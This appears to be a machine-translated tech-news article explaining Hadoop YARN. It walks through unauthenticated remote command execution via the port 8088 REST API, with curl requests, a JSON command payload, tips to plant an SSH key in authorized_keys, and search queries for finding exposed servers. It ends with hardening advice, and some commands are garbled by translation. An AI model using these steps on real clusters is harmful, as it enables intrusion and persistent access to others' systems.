Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

What is the execution of the Hadoop command

2025-01-15 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

It is believed that many inexperienced people have no idea about what the Hadoop command execution is like. Therefore, this article summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Hadoop introduction and vulnerability principle

Hadoop is a distributed system infrastructure based on Apache. Users can develop distributed programs, make full use of the power of the cluster for high-speed operation and storage, and implement a distributed file system (Hadoop Distributed File System).

Among them, the HDFS component has the characteristics of high fault tolerance, and it can provide high throughput (high throughput) to access the data of the application when deployed on low-cost (low-cost) hardware.

Apache Yarn (short for Yet Another Resource Negotiator) is a hadoop cluster resource manager system. Yarn was introduced from hadoop 2 to improve the implementation of MapReduce, but it is versatile and also implements other distributed computing models.

ApplicationMaster is responsible for negotiating the appropriate container with scheduler, tracking the status of applications, and monitoring their progress. ApplicationMaster is the process that coordinates the execution of applications in the cluster. Each application has its own ApplicationMaster, which is responsible for working with ResourceManager negotiating resources (container) and NodeManager to perform and monitor tasks.

When an ApplicationMaster starts, it periodically sends heartbeat reports to resourcemanager to confirm its health and required resources. In the established demand model, ApplicationMaster encapsulates preferences and limitations in the heartbeat information sent to resourcemanager. In the subsequent heartbeat, ApplicationMaster will lease the container that receives certain resources bound to specific nodes in the cluster. According to the container,ApplicationMaster sent by Resourcemanager, its implementation plan can be updated to adapt to insufficient or excess resources. Container can allocate and release resources dynamically.

Job-related commands:

1. View Job information: hadoop job-list 2. Kill Job: hadoop job-kill job_id3. More details of the assignment: hadoop job-history all output-dir 4. Kill the mission. A killed task is not bad for a failed attempt: hadoop jab-kill-task 5. Make the mission fail. Failed tasks are bad for failed attempts: hadoop job-fail-task

YARN command:

The YARN command invokes the bin/yarn script file, and if you run the yarn script without any parameters, descriptions of all yarn commands are printed.

Use: yarn [--config confdir] COMMAND [--loglevel loglevel] [GENERIC_OPTIONS] [COMMAND_OPTIONS] application use: yarn application [options]

Run the jar file

Users can package the written YARN code into a jar file and use this command to run it:

Yarn jar [mainClass] args...RCE implementation

The Hadoop service started with ROOT permission can execute the relevant job according to the parameters in the POST data submitted by the user on the server port 8088. The specific implementation is as follows:

Applications manager for port 8088:

1. Request * apply for a new application and make a POST request directly through curl: * *

Curl-v-X POST 'http://ip:8088/ws/v1/cluster/apps/new-application'

The return content is similar to:

{"application-id": "application_1527144634877_20465", "maximum-resource-capability": {"memory": 16384, "vCores": 8}}

two。 Construct and submit tasks

Construct the json file 1.json, which contains the following content. Application-id corresponds to the id obtained above. The command content is to try to create a test_1 file in the / var/tmp directory.

{"am-container-spec": {"commands": {"command": "echo '111' > > / var/tmp/test_1"}}, "application-id": "application_1527144634877_20465", "application-name": "test", "application-type": "YARN"}

Then send the data directly using curl:

Curl-s-I-X POST-H'Accept: application/json'-H 'Content-Type: application/json' http://ip:8088/ws/v1/cluster/apps-- data-binary @ 1.json

The attack can be completed and the command is executed. You can see that the corresponding file is generated in the corresponding directory, and the relevant information can be seen in the port 8088 Web interface:

Tips:

1 you can execute the results with ceye or dnslog test commands, or write the public key in / home/user/.ssh/authorized_keys.

2 search open service: title= "All Applications"

Or port=50070.

However, this approach has three limitations:

1. The service needs administrator permission to start, and the execution command is also the administrator permission to execute. Five ordinary users will only have a record of failure in the relevant command permissions, and the command execution will eventually fail, leaving a record of attacks that are difficult to delete.

2 is the 8088 management port of Hadoop. If you use permission authentication, you will be prompted.

AuthorizationException: "message": "Unable to obtain user name, user not authenticated.

3 is that the number of master+slave nodes is greater than or equal to 2 namenode tasks will be submitted to any node for processing according to the hadoop distributed mechanism. At present, the author has not found a way to specify the job.

Protection suggestion

1. It is recommended that the project owner block out the service ports exposed to the public network (8040, 8042, 8088, 50060, 50070, etc.), or do whitelist access processing.

two。 An access authentication process is performed to the Hadoop web Manager service (8088), and the received data packets are authenticated.

3. Modify the default port to prevent the port service from being used in bulk.

After reading the above, have you mastered the method of Hadoop command execution? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report